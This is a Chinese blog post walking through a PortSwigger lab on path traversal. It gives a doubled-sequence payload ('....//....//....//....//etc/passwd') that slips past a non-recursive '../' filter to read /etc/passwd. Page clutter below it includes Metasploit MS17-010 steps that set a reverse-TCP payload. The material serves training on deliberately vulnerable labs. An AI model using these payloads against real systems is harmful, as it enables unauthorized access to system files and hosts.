首页 > 其他分享 >burpsuite靶场----目录遍历----复写绕过

burpsuite靶场----目录遍历----复写绕过

时间:2023-10-13 16:00:39浏览次数:37  
标签:.. passwd .... burpsuite ---- 靶场 复写

burpsuite靶场----目录遍历----复写绕过

靶场地址

https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively

正式开始

1.查看图片

2.测试./../../../etc/passwd/etc/passwd都失败了
猜测是过滤了'../'采用复写绕过
....//....//....//....//etc/passwd

3.在bp里可以读到

标签:..,passwd,....,burpsuite,----,靶场,复写
From: https://www.cnblogs.com/thebeastofwar/p/17762364.html

相关文章

  • 今日总结10.13
    3、数据可视化: 将统计结果倒入MySql数据库中,通过图形化展示的方式展现出来。   ......
  • 本地虚拟机NAT连接不上网络
    1、Linux-Centos7网络NAT连接模式不能上网问题解决方法解决方法:猜测是NetworkManager服务导致#先关闭NetworkManager1、systemctlstopNetworkManager#重新启动网服务2、servicenetworkrestart#ifconfig检查信息3、pingwww.baidu.com#检查是否能够连通#.如果下次......
  • winform窗口使用已经添加的图标
    1.项目属性窗口,选择资源,添加资源,选择想要导入的ico图标,设置好名字,如my.2.修改form窗口代码publicForm1(){InitializeComponent();this.Icon=Resources.ResourceManager.GetObject("my")asIcon;}3.如果程序也想用......
  • CSP-S 2021 补题
    P7913[CSP-S2021]廊桥分配考虑对于国际航班和国内航班单独进行分配对于国际航班处理\(res1[i]\)数组作为给国际航班分配\(i\)个廊桥的最大飞机停靠数量\(res2[i]\)同理对于每一种类的航班我们维护一个\(in\)优先队列和一个\(left\)优先队列\(in\)队列中放所有......
  • 【多校联考NOIP#3】比赛复盘 && 题解
    A.卡牌这次比赛,一道签到题都没有。本来以为是线段树上二分。就类似于花神的数论题那道,刚开始暴力修改(修改到线段树的每一个叶子节点),然后由于boss的attack在不断增加,到了\(Att_i>=hp_j\)的时候,\(j\)这个牌顶多打一次,如果一个区间的\(max\)都小于boss的攻击力了,那么就不......
  • macbook设置充电上限
    针对internal芯片参考https://blog.csdn.net/happyyouli/article/details/115805747直接使用make可能会报错,改用cmakegitclonehttps://github.com/hholtmann/smcFanControl.gitcdsmcFanControl/smc-command添加CMakeLists.txtcmake_minimum_required(VERSION3.1......
  • 第一节-MS17-010
    //输入命令对IP进行完整的扫描nmap-T4-A-vip //输入命令启用msfmsfconsole //输入命令进行漏洞搜索searchms17-010 //选择使用攻击模块use0//设置攻击负载setpayloadwindows/x64/meterpreter/reverse_tcp//设置受害者IPsetrhostxxx.xxx.xxx.xxx/......
  • PHP 日期加月份
    function setMonth($time, $length){    // $time => 时间戳  $length => 加减几月(数字)    if (!is_numeric($time)) $time = strtotime($time);    if ($length > 0) $length = "+$length";    $hour = date(' H:i:s', $time); ......
  • 严重性 代码 说明 项目 文件 行 禁止显示状态 错误 LNK2019 无法解析的外部符号 _main
    问题描述按照思路写好了C++的程序之后,表面上看起来没什么错误,也没有红点点的出现,但是运行起来,就发现,爆出来这样一个错误:问题解决看了半天,查了半天资料,发现是这里出现了问题(我真的~~~):习惯了首字母大写,这个就当成类来写了,后来突然醒悟,这个是main函数,首字母是要小写:运行成功......
  • 每日总结07
    Result文件数据说明:Ip:106.39.41.166,(城市)Date:10/Nov/2016:00:01:02+0800,(日期)Day:10,(天数)Traffic:54,(流量)Type:video,(类型:视频video或文章article)Id:8701(视频或者文章的id)测试要求:1、 数据清洗:按照进行数据清洗,并将清洗后的数据导入hive数据库中。两阶段数据清洗:(1)......